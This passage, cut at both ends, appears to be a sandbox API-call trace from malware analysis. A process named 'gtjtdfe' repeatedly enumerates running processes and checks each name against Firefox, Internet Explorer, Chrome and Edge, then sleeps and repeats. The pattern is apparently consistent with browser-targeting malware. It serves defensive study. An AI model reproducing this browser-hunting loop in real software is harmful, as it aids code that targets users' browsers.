hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0217.510] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0217.510] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0217.510] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0217.510] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.510] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0217.510] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0217.510] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0217.510] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0217.510] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.510] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0217.511] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0217.511] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0217.511] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0217.511] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.511] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0217.511] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0217.511] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0217.511] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0217.511] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.511] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0217.512] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0217.512] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0217.512] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0217.512] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.512] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0217.512] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0217.512] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0217.512] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0217.513] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.513] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0217.513] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0217.513] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0217.513] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0217.513] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.513] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0217.514] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0217.514] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0217.514] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0217.514] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.514] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0217.514] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0217.514] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0217.514] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0217.514] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.514] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0217.515] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0217.515] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0217.515] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0217.515] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.515] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0217.515] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0217.515] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0217.515] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0217.515] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.515] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0217.516] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0217.516] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0217.516] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0217.516] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.516] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.516] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0217.516] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0217.516] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0217.516] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.516] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.517] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.517] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.517] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.517] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.517] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0217.518] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0217.518] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0217.518] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0217.518] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.518] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.518] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.518] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.518] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.518] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.518] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0217.519] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0217.519] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0217.519] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0217.519] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.519] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.519] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0217.519] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0217.519] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0217.519] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.519] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0217.520] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0217.520] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0217.520] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0217.520] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.520] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.520] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0217.520] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0217.521] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0217.521] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.521] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.521] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0217.521] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0217.521] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0217.521] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.521] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.522] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0217.522] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0217.522] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0217.522] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.522] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.522] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0217.522] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0217.522] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0217.522] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.522] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.523] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0217.523] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0217.523] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0217.523] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.523] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0217.523] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0217.523] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0217.523] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0217.523] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0217.523] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0217.524] CloseHandle (hObject=0xd4) returned 1 [0217.524] Sleep (dwMilliseconds=0x3e8) [0218.574] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0218.577] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.577] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0218.577] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0218.577] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0218.577] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0218.577] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.578] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0218.578] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0218.578] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0218.578] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0218.578] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.578] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0218.578] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0218.578] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0218.578] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.579] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.579] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0218.579] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0218.579] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0218.579] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.579] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.580] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0218.580] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0218.580] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0218.580] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.580] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.580] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0218.580] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0218.580] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0218.580] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.581] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.581] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0218.581] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0218.581] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0218.581] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.581] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.582] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0218.582] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0218.582] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0218.582] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.582] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.582] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0218.582] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0218.582] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0218.582] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.582] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0218.583] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0218.583] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0218.583] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0218.583] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.583] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.583] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.583] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.583] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.583] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.583] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.584] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.584] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.584] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.584] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.584] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.584] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.584] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.584] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.585] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.585] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.585] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.585] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.585] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.585] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.585] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.586] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.586] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.586] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.586] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.586] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, 